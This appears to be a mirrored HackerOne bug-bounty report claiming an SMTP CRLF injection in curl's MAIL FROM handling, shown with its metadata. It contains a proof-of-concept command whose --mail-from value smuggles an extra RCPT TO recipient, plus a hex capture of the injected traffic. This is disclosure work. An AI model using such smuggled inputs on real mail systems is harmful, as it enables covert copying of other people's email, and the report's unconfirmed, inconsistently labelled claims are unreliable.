curl: SMTP CRLF Injection in curl/libcurl via MAIL FROM/RCPT TO...

Description

SMTP CRLF Injection Vulnerability in curl/libcurl
## Vulnerability ID: CURL-SMTP-CRLF-2024
## CWE-93: Improper Neutralization of CRLF Sequences

### Executive Summary
curl/libcurl contains a CRLF injection vulnerability in its SMTP implementation that allows attackers to inject arbitrary SMTP commands by including CR (\r) and LF (\n) characters in mailbox addresses.

### Affected Versions
- curl 8.17.0 (latest stable) - CONFIRMED VULNERABLE
- Earlier versions likely affected

### Proof of Concept
```bash
# Vulnerable command - adds unauthorized recipient
curl --url "smtp://localhost:2525" \
--mail-from $'[email protected]\r\nRCPT TO:<[email protected]>' \
--mail-rcpt "[email protected]" \
--upload-file message.txt
```

Technical Details

Vulnerable Code Location: lib/smtp.c (lines 838-846)

```c
result = Curl_pp_sendf(data, &smtpc->pp, "MAIL FROM:%s%s%s%s%s%s",
from, // ← No CRLF validation
auth ? " AUTH=" : "",
auth ? auth : "",
size ? " SIZE=" : "",
size ? size : "",
utf8 ? " SMTPUTF8" : "");
```

Evidence from Raw Network Analysis:

```
HEX: 4d41494c2046524f4d3a3c66696e616c40746573742e636f6d0d0a5243505420544f3a70726f6f66406576696c2e636f6d3e0d0a
TEXT: 'MAIL FROM:<[email protected]\r\nRCPT TO:[email protected]>\r\n'
```
## Reproduction Environment
- **OS**: /Linux
- **curl version**: 8.17.0
- **Python**: 3.11 (for testing server)
- **Testing Method**: Local SMTP server analysis

## Impact

· Information Disclosure: Unauthorized email copying
· Privacy Violation: Secret email interception
· Access Control Bypass: Circumvents application-level restrictions
· Arbitrary Command Injection: Potential for further SMTP protocol manipulation

Remediation

1. Input Validation: Reject mailbox addresses containing control characters
2. Character Escaping: Properly escape CR/LF sequences
3. Library Patch: Implement validation similar to lib/cookie.c

References

· CWE-93: https://cwe.mitre.org/data/definitions/93.html
· curl Security: https://curl.se/docs/security.html

Visit Original Source

Basic Information

ID H1:3418616

Published Nov 10, 2025 at 15:11

Modified Nov 10, 2025 at 15:50

{
    "lastseen": "2025-11-10T16:40:11",
    "description": "SMTP CRLF Injection Vulnerability in curl/libcurl\n## Vulnerability ID: CURL-SMTP-CRLF-2024\n## CWE-93: Improper Neutralization of CRLF Sequences\n\n### Executive Summary\ncurl/libcurl contains a CRLF injection vulnerability in its SMTP implementation that allows attackers to inject arbitrary SMTP commands by including CR (\\r) and LF (\\n) characters in mailbox addresses.\n\n### Affected Versions\n- curl 8.17.0 (latest stable) - CONFIRMED VULNERABLE\n- Earlier versions likely affected\n\n### Proof of Concept\n```bash\n# Vulnerable command - adds unauthorized recipient\ncurl --url \"smtp://localhost:2525\" \\\n  --mail-from $'[email protected]\\r\\nRCPT TO:<[email protected]>' \\\n  --mail-rcpt \"[email protected]\" \\\n  --upload-file message.txt\n```\n\nTechnical Details\n\nVulnerable Code Location: lib/smtp.c (lines 838-846)\n\n```c\nresult = Curl_pp_sendf(data, &smtpc->pp, \"MAIL FROM:%s%s%s%s%s%s\", \n    from,  // \u2190 No CRLF validation\n    auth ? \" AUTH=\" : \"\", \n    auth ? auth : \"\", \n    size ? \" SIZE=\" : \"\", \n    size ? size : \"\", \n    utf8 ? \" SMTPUTF8\" : \"\");\n```\n\nEvidence from Raw Network Analysis:\n\n```\nHEX: 4d41494c2046524f4d3a3c66696e616c40746573742e636f6d0d0a5243505420544f3a70726f6f66406576696c2e636f6d3e0d0a\nTEXT: 'MAIL FROM:<[email protected]\\r\\nRCPT TO:[email protected]>\\r\\n'\n```\n## Reproduction Environment\n- **OS**: /Linux\n- **curl version**: 8.17.0\n- **Python**: 3.11 (for testing server)\n- **Testing Method**: Local SMTP server analysis\n\n## Impact\n\n\u00b7 Information Disclosure: Unauthorized email copying\n\u00b7 Privacy Violation: Secret email interception\n\u00b7 Access Control Bypass: Circumvents application-level restrictions\n\u00b7 Arbitrary Command Injection: Potential for further SMTP protocol manipulation\n\nRemediation\n\n1. Input Validation: Reject mailbox addresses containing control characters\n2. Character Escaping: Properly escape CR/LF sequences\n3. Library Patch: Implement validation similar to lib/cookie.c\n\nReferences\n\n\u00b7 CWE-93: https://cwe.mitre.org/data/definitions/93.html\n\u00b7 curl Security: https://curl.se/docs/security.html",
    "published": "2025-11-10T15:11:32",
    "modified": "2025-11-10T15:50:35",
    "type": "hackerone",
    "title": "curl: SMTP CRLF Injection in curl/libcurl via MAIL FROM/RCPT TO parameters",
    "source": "",
    "references": "",
    "id": "H1:3418616",
    "bulletinFamily": "bugbounty",
    "cwe": null,
    "cvelist": [],
    "sourceData": "",
    "sourceHref": "",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://hackerone.com/reports/3418616",
    "category_name": "News",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

curl: SMTP CRLF Injection in curl/libcurl via MAIL FROM/RCPT TO parameters_H1:3418616

Description

Basic Information

💭 Join the Security Discussion ❌ Cancel Reply